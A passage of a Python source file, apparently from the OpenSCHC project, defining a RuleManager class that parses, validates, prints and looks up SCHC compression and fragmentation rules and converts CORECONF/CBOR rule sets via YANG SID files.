\"DIRECT\" },\n T_COAP_OPT_URI_PATH : {\"FL\": \"var\", \"TYPE\": str, \"ALGO\": \"COAP_OPTION\" },\n T_COAP_OPT_CONT_FORMAT : {\"FL\": \"var\", \"TYPE\": int, \"ALGO\": \"COAP_OPTION\"},\n T_COAP_OPT_URI_QUERY : {\"FL\": \"var\", \"TYPE\": str, \"ALGO\": \"COAP_OPTION\" },\n 
T_COAP_OPT_NO_RESP : {\"FL\": \"var\", \"TYPE\": int, \"ALGO\": \"COAP_OPTION\"}\n}\n\n\n\nclass RuleManager:\n \"\"\"\n # Class RuleManager\n\n A RuleManager object is created this way:\n\n from RuleManager import *\n\n RM = RuleManager()\n\n arguments:\n\n - file: the RuleManager takes a file to upload rule_set\n - log: display debugging events\n\n \"\"\"\n\n def _return_default(self, elm, idx, val):\n \"\"\"test if a value is in the dictionary, otherwise return a specific value \"\"\"\n if idx in elm:\n return elm[idx]\n else:\n return val\n\n def Add(self, device=None, dev_info=None, file=None, compression=True):\n \"\"\"\n Add is used to add a new rule or a set of rules to a context. Add checks the validity of the rule:\n\n * ruleID/RuleIDLength do not overlap\n * the rule contains either one of a fragmentation and a compression description.\n\n If the DeviceID already exists in the context, the new rule is added to that context, providing no conflict on the RuleID is found.\n\n RM.Add ({\"DeviceID\": 0x1234567, \"sor\": {.....}})\n\n \"\"\"\n\n assert (dev_info is not None or file is not None)\n\n if file != None:\n dev_info = json.loads(open(file).read())\n\n if type(dev_info) is dict: #Context or Rules\n if T_RULEID in dev_info: # Rules\n sor = [dev_info]\n elif \"SoR\" in dev_info:\n if \"DeviceID\" in dev_info:\n device = dev_info[\"DeviceID\"]\n sor = dev_info[\"SoR\"]\n else:\n raise ValueError(\"unknown format\")\n elif type(dev_info) is list: # a Set of Rule\n sor = dev_info\n else:\n raise ValueError(\"unknown structure\")\n\n # check nature of the info: if \"SoR\" => device context, if \"RuleID\" => rule\n\n d = None\n for d in self._ctxt:\n if device == d[\"DeviceID\"]:\n break\n else:\n d = {\"DeviceID\": device, \"SoR\": []}\n self._ctxt.append(d)\n\n d[T_META] = {T_LAST_USED: None}\n print (\"@@@@@\", d)\n\n for n_rule in sor:\n if T_RULEID in n_rule:\n n_ruleID = n_rule[T_RULEID]\n elif T_RULEIDVALUE in n_rule:\n n_ruleID = n_rule[T_RULEIDVALUE]\n else:\n raise ValueError(\"Rule ID Value is missing\")\n n_ruleLength = n_rule[T_RULEIDLENGTH]\n left_aligned_n_ruleID = n_ruleID << (32 - n_ruleLength)\n\n overlap = False\n for e_rule in d[\"SoR\"]: # check no overlaps on RuleID\n left_aligned_e_ruleID = e_rule[T_RULEID] << (32 - e_rule[T_RULEIDLENGTH])\n if left_aligned_e_ruleID == left_aligned_n_ruleID:\n dprint (\"Warning; Rule {}/{} exists not inserted\".format(bin(n_ruleID), n_ruleLength) )\n overlap = True\n break\n\n if not overlap:\n if T_COMP in n_rule:\n r = self._create_compression_rule(n_rule, device)\n d[\"SoR\"].append(r)\n elif T_FRAG in n_rule:\n r = self._create_fragmentation_rule(n_rule)\n d[\"SoR\"].append(r)\n elif T_NO_COMP in n_rule:\n already_exists = self.FindNoCompressionRule(deviceID=device)\n if already_exists == None:\n arule = {}\n arule[T_RULEID] = n_ruleID\n arule[T_RULEIDLENGTH] = n_rule[T_RULEIDLENGTH]\n arule[T_NO_COMP] = []\n d[\"SoR\"].append(arule)\n else:\n print (\"Warning 'no compression' rule already exists\")\n else:\n raise ValueError (\"Rule type undefined\")\n #print (n_rule)\n\n def _create_fragmentation_rule (self, nrule):\n arule = {}\n if T_RULEID in nrule:\n arule[T_RULEID] = nrule[T_RULEID]\n elif T_RULEIDVALUE in nrule:\n arule[T_RULEID] = nrule[T_RULEIDVALUE]\n else:\n raise ValueError(\"Rule ID missing.\")\n arule[T_RULEIDLENGTH] = nrule[T_RULEIDLENGTH]\n arule[T_FRAG] = {}\n\n def _default_value (ar, nr, idx, default=None, failed=False):\n if failed and not idx in nr[T_FRAG][T_FRAG_PROF]:\n raise ValueError (\"{} not 
found\".format(idx))\n\n if not T_FRAG_PROF in nr[T_FRAG] or not idx in nr[T_FRAG][T_FRAG_PROF]:\n ar[T_FRAG][T_FRAG_PROF][idx] = default\n else:\n ar[T_FRAG][T_FRAG_PROF][idx] = nr[T_FRAG][T_FRAG_PROF][idx]\n\n if not T_FRAG_DIRECTION in nrule[T_FRAG]:\n raise ValueError (\"Keyword {} must be specified with {} or {}\".format(T_FRAG_DIRECTION, T_DIR_UP, T_DIR_DW))\n\n if not nrule[T_FRAG][T_FRAG_DIRECTION] in [T_DIR_UP, T_DIR_DW]:\n raise ValueError (\"Keyword {} must be {} or {}\".format(T_FRAG_DIRECTION, T_DIR_UP, T_DIR_DW))\n\n arule[T_FRAG][T_FRAG_DIRECTION] = nrule[T_FRAG][T_FRAG_DIRECTION] \n\n\n if T_FRAG_MODE in nrule[T_FRAG]:\n if not T_FRAG_PROF in nrule[T_FRAG]:\n arule[T_FRAG][T_FRAG_MODE] = {}\n\n if nrule[T_FRAG][T_FRAG_MODE] in [T_FRAG_NO_ACK, T_FRAG_ACK_ALWAYS, T_FRAG_ACK_ON_ERROR]:\n arule[T_FRAG][T_FRAG_MODE] = nrule[T_FRAG][T_FRAG_MODE]\n arule[T_FRAG][T_FRAG_PROF] ={}\n\n _default_value (arule, nrule, T_FRAG_FCN)\n _default_value (arule, nrule, T_FRAG_DTAG_SIZE, 0)\n _default_value (arule, nrule, T_FRAG_MIC, T_FRAG_RFC8724)\n\n if nrule[T_FRAG][T_FRAG_MODE] == T_FRAG_NO_ACK:\n _default_value(arule, nrule, T_FRAG_DTAG_SIZE, 2)\n _default_value (arule, nrule, T_FRAG_W_SIZE, 0)\n _default_value (arule, nrule, T_FRAG_FCN, 3)\n _default_value(arule, nrule, T_FRAG_L2WORDSIZE, 8)\n elif nrule[T_FRAG][T_FRAG_MODE] == T_FRAG_ACK_ALWAYS:\n _default_value (arule, nrule, T_FRAG_W_SIZE, 1)\n _default_value(arule, nrule, T_FRAG_L2WORDSIZE, 8)\n _default_value (arule, nrule, T_FRAG_MAX_RETRY, 4)\n _default_value (arule, nrule, T_FRAG_TIMEOUT, 600)\n elif nrule[T_FRAG][T_FRAG_MODE] == T_FRAG_ACK_ON_ERROR:\n if not T_FRAG_FCN in nrule[T_FRAG][T_FRAG_PROF]:\n raise ValueError (\"FCN Must be specified for Ack On Error\")\n\n _default_value (arule, nrule, T_FRAG_W_SIZE, 1)\n _default_value (arule, nrule, T_FRAG_ACK_BEHAVIOR, T_FRAG_AFTER_ALL1)\n _default_value (arule, nrule, T_FRAG_TILE, None, True)\n _default_value (arule, nrule, T_FRAG_MAX_RETRY, 4)\n _default_value (arule, nrule, T_FRAG_TIMEOUT, 600)\n _default_value (arule, nrule, T_FRAG_L2WORDSIZE, 8)\n _default_value (arule, nrule, T_FRAG_LAST_TILE_IN_ALL1, None, True)\n\n if nrule[T_FRAG][T_FRAG_PROF][T_FRAG_LAST_TILE_IN_ALL1] == True:\n raise NotImplementedError (\"Last tile in All-1 is not implemented yet\")\n\n # the size include All-*, Max_VLAUE is WINDOW_SIZE-1\n _default_value(arule, nrule, T_FRAG_WINDOW_SIZE, (0x01 <<(arule[T_FRAG][T_FRAG_PROF][T_FRAG_FCN]))-1)\n else:\n raise ValueError (\"Unknown fragmentation mode\", nrule[T_FRAG][T_FRAG_MODE])\n else:\n raise ValueError(\"No fragmentation mode\")\n\n return arule\n\n def get_values(self, values):\n \"\"\"This function transforms the YANG list indexed with the first element, to a Python list.\n The key do not have to be sorted, unlisted positions are filled with None. Element stays as\n byte array. 
\n \"\"\"\n value_list = []\n for e in values: \n list_len = len(value_list)\n for i in range(list_len, e[1]+1): # fill with None to the position\n value_list.append(None)\n\n value_list[e[1]] = e[2]\n\n return value_list\n\n def _create_compression_rule (self, nrule, device_id = None):\n \"\"\"\n parse a rule to verify values and fill defaults\n \"\"\"\n arule = {}\n if T_RULEID in nrule: # transition for RuleID to RuleIDValue\n arule[T_RULEID] = nrule[T_RULEID]\n elif T_RULEIDVALUE in nrule:\n arule[T_RULEID] = nrule[T_RULEIDVALUE]\n else:\n raise ValueError(\"RuleID Value is missing\")\n arule[T_RULEIDLENGTH] = nrule[T_RULEIDLENGTH]\n\n if T_ACTION in nrule:\n print (\"Warning: using experimental Action\")\n arule[T_ACTION] = nrule[T_ACTION]\n\n\n\n arule[T_COMP] = []\n\n up_rules = 0\n dw_rules = 0\n\n for r in nrule[T_COMP]:\n if r[\"FID\"] == T_COAP_OPT_END:\n # XXX: check ignoring is the proper behavior, or what should be done the T_COAP_OPT_END\n # which is still generated by the parser but was not handled by this code.\n warnings.warn(\"Note: T_COAP_OPT_END is ignored\")\n continue\n if not r[\"FID\"] in FIELD__DEFAULT_PROPERTY:\n raise ValueError( \"Unkwown field id {} in rule {}/{}\".format(\n r[\"FID\"], arule[T_RULEID], arule[T_RULEIDLENGTH]\n ))\n\n entry = {}\n FID = r[T_FID]\n entry[T_FID] = FID\n entry[T_FL] = self._return_default(r, T_FL, FIELD__DEFAULT_PROPERTY[FID][T_FL])\n entry[T_FP] = self._return_default(r, T_FP, 1)\n entry[T_DI] = self._return_default(r, T_DI, T_DIR_BI)\n if entry[T_DI] in [T_DIR_BI, T_DIR_UP]: up_rules += 1\n if entry[T_DI] in [T_DIR_BI, T_DIR_DW]: dw_rules += 1\n\n MO = r[T_MO].upper()\n if MO in [T_MO_EQUAL, T_MO_MSB, T_MO_IGNORE, T_MO_MATCH_REV_RULE]:\n if MO == T_MO_MSB:\n if T_MO_VAL in r:\n entry[T_MO_VAL] = r[T_MO_VAL]\n else:\n raise ValueError (\"MO Value missing for {}\".format(FID))\n\n if T_TV in r:\n if type(r[T_TV]) is dict:\n if len(r[T_TV]) != 1:\n raise ValueError(FID+\": Only one command for TV.\")\n\n if not list(r[T_TV])[0] in [T_CMD_INDIRECT]:\n raise ValueError(FID+\": Unknown TV command.\")\n\n dic = r[T_TV] # set value to bytearray\n key = next(iter(dic))\n val = list(dic.values())[0]\n\n\n print (\"---------> \", key, val)\n entry[T_TV_IND] = adapt_value(key,entry[T_FL], FID)\n else:\n entry[T_TV] = adapt_value(r[T_TV], entry[T_FL], FID)\n else:\n entry[T_TV] = None\n\n elif MO == T_MO_MMAP:\n entry[T_TV] = []\n for e in r[T_TV]:\n entry[T_TV].append(adapt_value(e, entry[T_FL], FID))\n\n else:\n raise ValueError(\"{} MO unknown\".format(MO))\n entry[T_MO] = MO\n\n CDA = r[T_CDA].upper()\n if not CDA in [T_CDA_NOT_SENT, T_CDA_VAL_SENT, T_CDA_MAP_SENT, T_CDA_LSB, T_CDA_COMP_LEN, \n T_CDA_COMP_CKSUM, T_CDA_DEVIID, T_CDA_APPIID, T_CDA_REV_COMPRESS]:\n raise ValueError(\"{} CDA not found\".format(CDA))\n entry[T_CDA] = CDA\n\n arule[T_COMP].append(entry)\n\n if not T_META in arule:\n arule[T_META] = {}\n arule[T_META][T_UP_RULES] = up_rules\n arule[T_META][T_DW_RULES] = dw_rules\n arule[T_META][T_DEVICEID] = device_id\n arule[T_META][T_LAST_USED] = None\n\n return arule\n\n\n def __init__(self, file=None, log=None):\n #RM database\n self._ctxt = []\n self._log = log\n self._db = []\n self._sid_info = []\n self.sid_key_mapping = {}\n\n def _smart_print(self, v):\n if type(v) is str:\n v = '\"'+v+'\"'\n print ('{:<30}'.format(v), end=\"\")\n elif type(v) is int:\n print ('{:>30}'.format(v), end=\"\")\n elif type(v) is bytes:\n print ('{:>30}'.format(v.hex()), end=\"\")\n\n def printBin(self, v, l):\n txt = \"\"\n for i in range 
(7, -1, -1):\n if i >= l: txt += \" \"\n elif v & (0x01 << i) == 0: txt += \"0\"\n else: txt += \"1\"\n return txt\n\n def Print (self):\n \"\"\"\n Print a context\n \"\"\"\n for dev in self._ctxt:\n print (\"*\"*40)\n print (\"Device:\", dev[\"DeviceID\"])\n\n for rule in dev[\"SoR\"]:\n print (\"/\" + \"-\"*25 + \"\\\\\")\n txt = str(rule[T_RULEID])+\"/\"+ str(rule[T_RULEIDLENGTH])\n print (\"|Rule {:8} {:10}|\".format(txt, self.printBin(rule[T_RULEID], rule[T_RULEIDLENGTH])))\n\n if T_COMP in rule:\n print (\"|\" + \"-\"*15 + \"+\" + \"-\"*3 + \"+\" + \"-\"*2 + \"+\" + \"-\"*2 + \"+\" + \"-\"*30 + \"+\" + \"-\"*13 + \"+\" + \"-\"*16 +\"\\\\\")\n for e in rule[T_COMP]:\n msg2 = None\n if len(e[T_FID]) < 16:\n print (\"|{:<15s}|{:>3}|{:2}|{:2}|\".format(e[T_FID], e[T_FL], e[T_FP], e[T_DI]), end='')\n else:\n msg = e[T_FID]\n if \"-\" in msg:\n msg1, msg2 = msg.split('-')\n msg1 += '-'\n else:\n msg1 = msg[:15]\n msg2 = msg[15:]\n print (\"|{:<15s}|{:>3}|{:2}|{:2}|\".format(msg1, e[T_FL], e[T_FP], e[T_DI]), end=\"\")\n\n if 'TV' in e:\n if type(e[T_TV]) is list:\n self._smart_print(e[T_TV][0])\n elif type(e[T_TV]) is dict:\n self._smart_print(list(e[T_TV])[0]+'('+list(e[T_TV].values())[0]+')' )\n else:\n self._smart_print(e[T_TV])\n if not T_TV in e or e[T_TV] == None:\n print (\"-\"*30, end=\"\")\n\n txt = e[T_MO]\n if T_MO_VAL in e:\n txt = txt+ '(' + str(e[T_MO_VAL])+')'\n\n print (\"|{:13}|{:16}|\".format(txt, e[T_CDA]))\n\n if (T_TV in e) and (type (e[T_TV]) is list):\n for i in range (1, len(e[T_TV])):\n print (\":{:^15s}:{:^3}:{:^2}:{:^2}:\".format(\".\", \".\", \".\",\".\"), end='')\n self._smart_print(e[T_TV][i])\n print (\":{:^13}:{:^16}:\".format(\".\", \".\"))\n\n if msg2 != None: # FID is too large, wrote it on 2 lignes, this is the second line\n print (\"|{:<15s}|{:>3}|{:2}|{:2}|{:30}|{:13}|{:16}|\".format(msg2, \"\", \"\", \"\", \"\", \"\", \"\" ), )\n\n print (\"\\\\\" + \"-\"*15 + \"+\" + \"-\"*3 + \"+\" + \"-\"*2 + \"+\" + \"-\"*2 + \"+\" + \"-\"*30 + \"+\" + \"-\"*13 + \"+\" + \"-\"*16 +\"/\")\n elif T_FRAG in rule:\n # print (rule)\n if rule[T_FRAG][T_FRAG_DIRECTION] == T_DIR_UP:\n dir_c = \"^\"\n else:\n dir_c = \"v\"\n\n print (\"!\" + \"=\"*25 + \"+\" + \"=\"*61 +\"\\\\\")\n print (\"!{} Fragmentation mode : {:<15} header dtag{:2} Window {:2} FCN {:2} {:13}{:2} {}!\"\n .format(\n dir_c,\n rule[T_FRAG][T_FRAG_MODE],\n rule[T_FRAG][T_FRAG_PROF][T_FRAG_DTAG_SIZE],\n rule[T_FRAG][T_FRAG_PROF][T_FRAG_W_SIZE],\n rule[T_FRAG][T_FRAG_PROF][T_FRAG_FCN],\n \"\",\n rule[T_FRAG][T_FRAG_DIRECTION],\n dir_c\n ))\n\n if T_FRAG_TILE in rule[T_FRAG][T_FRAG_PROF]:\n txt = \"Tile size: \"+ str(rule[T_FRAG][T_FRAG_PROF][T_FRAG_TILE])\n else:\n txt = \"No Tile size specified\"\n print (\"!{} {:<84}{}!\".format(dir_c, txt, dir_c))\n\n\n print (\"!{} RCS Algorithm: {:<69}{}!\".format(dir_c,rule[T_FRAG][T_FRAG_PROF][T_FRAG_MIC], dir_c))\n\n if rule[T_FRAG][T_FRAG_MODE] != T_FRAG_NO_ACK:\n print (\"!{0}\" + \"-\"*83 +\"{0}!\".format(dir_c))\n if rule[T_FRAG][T_FRAG_MODE] == T_FRAG_ACK_ON_ERROR:\n txt = \"Ack behavior: \"+ rule[T_FRAG][T_FRAG_PROF][T_FRAG_ACK_BEHAVIOR]\n print (\"!{} {:<84}{}!\".format(dir_c, txt, dir_c))\n\n print (\"!{} Max Retry : {:4} Timeout {:5} seconds {:42} {}!\".format(\n dir_c,\n rule[T_FRAG][T_FRAG_PROF][T_FRAG_MAX_RETRY],\n rule[T_FRAG][T_FRAG_PROF][T_FRAG_TIMEOUT], \"\",\n dir_c\n ))\n\n print (\"\\\\\" + \"=\"*87 +\"/\")\n elif T_NO_COMP in rule:\n print (\"+\"+ \"~\"*25 + \"+\")\n print (\"| NO COMPRESSION |\")\n print (\"\\\\\"+ \"~\"*25 + \"/\")\n\n if 
T_INDEXES in dev and len(dev[T_INDEXES]) > 0:\n print (\"INDEXES:\")\n for x, y in dev[T_INDEXES].items():\n print (x,\"-->\", y)\n\n\n# Find rules \n\n def MO_IGNORE (self, TV, FV, rlength, flength, arg, direction=None):\n return True\n\n def MO_EQUAL (self, TV, FV, rlength, flength, arg, direction=None):\n if type(TV) != type(FV):\n return False\n\n if TV != FV: return False\n return True\n\n def MO_MSB (self, TV, FV, rlength, flength, arg, direction=None):\n print (\"MSB\")\n print (TV, FV, rlength, flength, arg)\n\n if rlength == T_FUNCTION_VAR:\n rlength = flength\n\n ignore_bit = rlength - arg\n\n for b in range(arg):\n pos = b%8\n byte_pos = b//8\n\n right_byte_tv = TV[byte_pos]\n right_byte_fv = FV[byte_pos]\n\n bit_tv = right_byte_tv & (1 << (7 -pos))\n bit_fv = right_byte_fv & (1 << (7 -pos))\n\n print (b, pos, ignore_bit,'|', TV, FV, '|', right_byte_tv, right_byte_fv, '-',bit_tv, bit_fv)\n\n if bit_tv != bit_fv:\n print (\"comparison failed\")\n return False\n \n print (\"comparison succeeded\")\n return True\n\n\n def MO_MMAP (self, TV, FV, rlength, flength, arg, direction=None):\n for v in TV:\n if self.MO_EQUAL (v, FV, rlength, flength, arg): return True\n return False\n \n def MO_MATCH_REV_RULE (self, TV, FV, rlength, flength, arg, direction=None):\n\n if direction == T_DIR_UP:\n direction = T_DIR_DW\n elif direction == T_DIR_DW:\n direction = T_DIR_UP\n\n P = Parser(None)\n\n header_d, payload, error = P.parse(FV, direction=direction)\n rule = self.FindRuleFromPacket(header_d, direction=direction)\n\n if rule == None:\n return False\n \n return True \n\n MO_function = {\n T_MO_IGNORE : MO_IGNORE,\n T_MO_EQUAL : MO_EQUAL,\n T_MO_MSB : MO_MSB,\n T_MO_MMAP : MO_MMAP,\n T_MO_MATCH_REV_RULE: MO_MATCH_REV_RULE,\n }\n\n def FindRuleFromSCHCpacket (self, schc, device=None):\n \"\"\" returns the rule corresponding to the id stored at the\n beginning of the SCHC packet.\n \"\"\"\n\n for d in self._ctxt:\n dprint (d[\"DeviceID\"])\n if d[\"DeviceID\"] == device: #look for a specific device\n for r in d[\"SoR\"]:\n ruleID = r[T_RULEID]\n ruleLength = r[T_RULEIDLENGTH]\n\n tested_rule = schc.get_bits(ruleLength, position=0)\n\n dprint (tested_rule, ruleID)\n if tested_rule == ruleID:\n return r\n\n return None\n\n\n def FindRuleFromPacket(self, pkt, direction=T_DIR_BI, failed_field=False):\n \"\"\" Takes a parsed packet and returns the matching rule.\n \"\"\"\n for dev in self._ctxt:\n for rule in dev[\"SoR\"]:\n if \"Compression\" in rule:\n matches = 0\n for r in rule[\"Compression\"]:\n print(r)\n #print (pkt[(r[T_FID], r[T_FP])][0])\n if r[T_DI] == T_DIR_BI or r[T_DI] == direction:\n if (r[T_FID], r[T_FP]) in pkt:\n if T_MO_VAL in r:\n arg = r[T_MO_VAL]\n else:\n arg = None\n\n if self.MO_function[r[T_MO]](self,\n r[T_TV], pkt[(r[T_FID], r[T_FP])][0],\n r[T_FL], pkt[(r[T_FID], r[T_FP])][1],\n arg, direction=direction):\n matches += 1\n else:\n if failed_field:\n print(\"rule {}/{}: field {} does not match TV={} FV={} rlen={} flen={} arg={}\".format(\n rule[T_RULEID], rule[T_RULEIDLENGTH],\n r[T_FID],\n r[T_TV], pkt[(r[T_FID], r[T_FP])][0],\n r[T_FL], pkt[(r[T_FID], r[T_FP])][1],\n arg))\n break # field does not match, rule does not match\n else:\n if r[T_FL] == \"var\": # entry not found, but variable length => accept\n matches += 1 # residue size set to 0\n dprint(\"Suboptimal rule\")\n else:\n dprint(\"field from rule not found in pkt\")\n break # field from rule not found in pkt, go to next\n print (\"->\", matches)\n print(\"-\"*10, \"matches:\", matches, len(pkt), 
rule[T_META][T_UP_RULES], rule[T_META][T_DW_RULES])\n if direction == T_DIR_UP and matches == rule[T_META][T_UP_RULES]: return rule\n if direction == T_DIR_DW and matches == rule[T_META][T_DW_RULES]: return rule\n return None\n\n def FindNoCompressionRule(self, deviceID=None):\n for d in self._ctxt:\n if d[\"DeviceID\"] == deviceID:\n for r in d[\"SoR\"]:\n if T_NO_COMP in r:\n return r\n\n return None \n\n def FindFragmentationRule(self, deviceID=None, originalSize=None, \n reliability=T_FRAG_NO_ACK, direction=T_DIR_UP, \n packet=None):\n \"\"\"Lookup a fragmentation rule.\n\n Find a fragmentation rule regarding parameters:\n * original SCHC packet size\n * reliability NoAck, AckOnError, AckAlways\n * direction (UP or DOWN)\n NOTE: Not yet implemented, returns the first fragmentation rule. \n XXX please check whether the following strategy is okay.\n - if direction is specified, and deviceID is None, it is assumed that\n the request is for a device. Return the 1st rule matched with the\n direction regardless of the deviceID. A deviceID for a device is\n not configured typically.\n - if raw_packet is not None, it compares the rule_id with the packet.\n - if the direction and the deviceID is matched.\n \"\"\"\n dprint(\"FindFragmentationRule\", deviceID, direction)\n\n if direction is not None and deviceID is not None:\n for d in self._ctxt:\n if d[\"DeviceID\"] == deviceID:\n for r in d[\"SoR\"]:\n if T_FRAG in r and r[T_FRAG][T_FRAG_DIRECTION] == direction:\n return r\n\n elif direction is not None and deviceID is None:\n for d in self._ctxt:\n for r in d[\"SoR\"]:\n if T_FRAG in r and r[T_FRAG][T_FRAG_DIRECTION] == direction:\n # return the 1st one.\n return r\n elif packet is not None:\n print(\"packet dev-id\", deviceID)\n for d in self._ctxt:\n for r in d[\"SoR\"]:\n print(\"rule dev-id\", d[\"DeviceID\"])\n if T_FRAG in r:\n rule_id = packet.get_bits(r[T_RULEIDLENGTH], position=0)\n if r[T_RULEID] == rule_id:\n return r\n else:\n for d in self._ctxt:\n if d[\"DeviceID\"] == deviceID:\n for r in d[\"SoR\"]:\n if T_FRAG in r:\n return r\n return None\n\n# CORECONF \n\n def add_sid_file(self, name):\n with open(name) as sid_file:\n sid_values = json.loads(sid_file.read())\n\n if 'key-mapping' not in sid_values:\n print (\"\"\"{} sid file has not been generated with the --sid-extention options.\\n\\\nSome conversion capabilities may not work; 
see http://github.com/ltn22/pyang\"\"\".format(name)) \n else:\n for k, v in sid_values['key-mapping'].items():\n if k in self.sid_key_mapping:\n print (\"key sid\", k, \"already present, ignoring...\")\n else: \n self.sid_key_mapping[int(k)] = v\n del(sid_values[\"key-mapping\"])\n\n self._sid_info.append(sid_values)\n\n def sid_search_for(self, name, space=\"data\"):\n\n for s in self._sid_info:\n for e in s[\"items\"]:\n if e[\"identifier\"] == name and e[\"namespace\"]==space:\n return e[\"sid\"]\n return None \n\n def sid_search_sid(self, value, short=False):\n \"\"\"return YANG ID form a SID, if short is set to true, the module id is not concatenated.\"\"\"\n for s in self._sid_info:\n name = s[\"module-name\"]\n for e in s[\"items\"]:\n if e[\"sid\"] == value:\n if e[\"namespace\"] == \"identity\":\n if short:\n return e[\"identifier\"]\n else: \n return name + \":\" + e[\"identifier\"]\n elif e[\"namespace\"] == \"data\":\n return e[\"identifier\"]\n else:\n raise ValueError(\"not a good namespace\", e[\"namespace\"])\n\n raise ValueError(\"Not found\", value)\n return None \n\n def openschc_id (self, yang_id):\n \"\"\"return an OpenSCHC ID giving a yang ID stored in .sid files\"\"\"\n for i in YANG_ID:\n if YANG_ID[i][1] == yang_id:\n return i\n\n raise ValueError(yang_id, \"not known by openSCHC\")\n\n def get_yang_type (self, yangid):\n for s in self._sid_info:\n module_name = s['module-name']\n for e in s['items']:\n if e['identifier'] == yangid:\n if \"type\" in e:\n if type(e['type']) is str:\n if e[\"type\"] in [\"int8\", \"int16\", \"int32\", \"uint8\", \"uint16\", \"uint32\"]:\n return \"int\"\n elif e[\"type\"] in [\"string\", 'binary']:\n return e['type']\n else:\n return 'identifier'\n elif type(e['type']) is list: # union, should be extended\n \"\"\"In theorie, this function is called when a cbor data for an int is found. \n regarding the CORECONF coding, other alternative\n identifier or enum are tagged, and will be processed directly by other\n function, so whenan union is found, it should be the array. The only test\n is to check that int in the array or generate an error. \"\"\"\n return 'union'\n else: \n return \"node\" # this is not a leaf\n return None #yandid not found\n\n\n def cbor_header (self, major, value):\n if value < 23:\n return struct.pack ('!B', (major | value))\n elif value < 255:\n return struct.pack ('!BB', (major | 24), value)\n\n def from_coreconf(self, device=None, dev_info=None, file=None, compression=True):\n \"\"\"\n Take a coreconf representation and store it in the rule manager.\n \"\"\"\n\n assert (dev_info is not None or file is not None)\n\n if file != None:\n dev_info = open(file).read() \n\n # allows CBOR or Python structure, if CBOR convert it in Python. 
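\n # (added note) cbor2.loads() decodes the CORECONF byte string into the\n # SID-keyed dict handled below; a dict argument is assumed to already be in that form.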
\n if type(dev_info) is bytes:\n rule_input = cbor.loads(dev_info) # store CBOR CORECONF\n elif type(dev_info) is dict:\n rule_input = dev_info # coreconf already in python\n else:\n raise ValueError(\"Unknown rule format\")\n\n SoR = []\n\n schc_id = self.sid_search_for(name=\"/ietf-schc:schc\", space=\"data\")\n\n if not schc_id in rule_input:\n print (\"This is a not a Set of Rule\")\n return None\n\n entry = rule_input[schc_id]\n\n sid_ref = self.sid_search_for(name=\"/ietf-schc:schc/rule\", space=\"data\")\n rid_value_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-value\", space=\"data\") - sid_ref\n rid_length_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-length\", space=\"data\") - sid_ref\n rule_nature_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-nature\", space=\"data\") - sid_ref\n for rule in entry[1]:\n arule = {}\n arule[T_RULEID] = rule[rid_value_sid]\n arule[T_RULEIDLENGTH] =rule[rid_length_sid]\n rule_nature = rule[rule_nature_sid]\n\n nature = self.sid_search_sid (rule_nature, short=True)\n if nature == \"nature-compression\":\n entry = []\n entry_ref = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry\", space=\"data\") \n entry_sid = entry_ref - sid_ref\n fid_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-id\", space=\"data\") - entry_ref\n fl_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-length\", space=\"data\") - entry_ref\n fpos_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-position\", space=\"data\") - entry_ref\n dir_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/direction-indicator\", space=\"data\") - entry_ref\n mo_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/matching-operator\", space=\"data\") - entry_ref\n mo_val_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/matching-operator-value\", space=\"data\") - entry_ref\n cda_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/comp-decomp-action\", space=\"data\") - entry_ref\n tv_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/target-value\", space=\"data\") - entry_ref\n\n up_rules = 0\n dw_rules = 0\n for r in rule[entry_sid]:\n entry_elm = {}\n\n fid_value = r[fid_sid]\n fid_yang_name = self.sid_search_sid (fid_value, short=True)\n o_schc_id = self.openschc_id(fid_yang_name)\n entry_elm[T_FID] = o_schc_id\n\n fl_value = r[fl_sid]\n if type(fl_value) is cbor.CBORTag and fl_value.tag == 45:\n fl_value = self.sid_search_sid(fl_value.value, short = True)\n if fl_value == \"fl-token-length\": # use OPENSCHC ID\n fl_value = T_FUNCTION_TKL \n elif fl_value == \"fl-variable\":\n fl_value = T_FUNCTION_VAR\n entry_elm[T_FL] = fl_value\n\n dir_value = r[dir_sid]\n dir_yang_name = self.sid_search_sid (dir_value, short=True)\n o_schc_id = self.openschc_id(dir_yang_name) \n entry_elm[T_DI] = o_schc_id\n\n if o_schc_id == T_DIR_BI:\n up_rules += 1\n dw_rules += 1\n elif o_schc_id == T_DIR_UP:\n up_rules += 1\n elif o_schc_id == T_DIR_DW:\n dw_rules += 1\n\n fpos = r[fpos_sid]\n entry_elm[T_FP] = fpos\n\n mo_value = r[mo_sid]\n mo_yang_name = self.sid_search_sid (mo_value, short=True)\n o_schc_id = self.openschc_id(mo_yang_name)\n entry_elm[T_MO] = o_schc_id\n\n if mo_val_sid in r:\n values = self.get_values(r[mo_val_sid])\n entry_elm[T_MO_VAL] = int.from_bytes(values[0], byteorder='big') # 1 arg = length\n\n cda_value = r[cda_sid]\n cda_yang_name = self.sid_search_sid (cda_value, short=True)\n o_schc_id = self.openschc_id(cda_yang_name)\n entry_elm[T_CDA] = 
o_schc_id\n\n if tv_sid in r:\n values = self.get_values(r[tv_sid])\n #print (values)\n if len (values) == 1:\n entry_elm[T_TV] = values[0]\n else:\n entry_elm[T_TV] = values\n\n #print (entry_elm, up_rules, dw_rules)\n\n entry.append(entry_elm)\n\n arule[T_COMP] = entry\n if not T_META in arule:\n arule[T_META] = {}\n arule[T_META][T_UP_RULES] = up_rules\n arule[T_META][T_DW_RULES] = dw_rules\n arule[T_META][T_DEVICEID] = device\n\n\n elif nature ==\"nature-fragmentation\":\n #print ('fragmentation')\n arule[T_FRAG] = {}\n arule[T_FRAG][T_FRAG_PROF] = {}\n frag_mod_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/fragmentation-mode\", space=\"data\") - sid_ref\n frag_mod_id = self.sid_search_sid(rule[frag_mod_sid], short=True)\n\n l2_word_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/l2-word-size\", space=\"data\") - sid_ref\n if 